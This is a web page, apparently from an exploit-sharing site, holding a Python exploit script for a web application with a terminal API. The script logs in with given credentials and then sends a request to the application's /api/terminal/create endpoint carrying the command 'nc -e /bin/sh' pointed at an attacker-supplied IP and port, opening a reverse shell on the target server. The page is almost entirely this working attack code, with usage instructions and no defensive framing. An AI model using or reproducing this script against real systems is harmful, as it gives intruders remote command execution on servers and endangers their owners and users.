扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
#!/usr/bin/python3 import requests import sys import warnings from bs4 import BeautifulSoup import json warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] req = requests.session() login_creds = { "username":username, "password":password, "mode":"normal"} print("[+] Sendin login request...") login = req.post(url+"/api/core/auth", json = login_creds) if username in login.text: page = url + "/api/terminal/create" payload = { 'command':'nc -e /bin/sh ' + ip + ' ' + port , 'autoclose':True } payload = json.dumps(payload) print("[+] Sending payload...") send_payload = req.post(page, payload) print("[+] Check your listener !...") else: print("[-] Wrong credentials or may the system patched.") exit() |
体验盒子
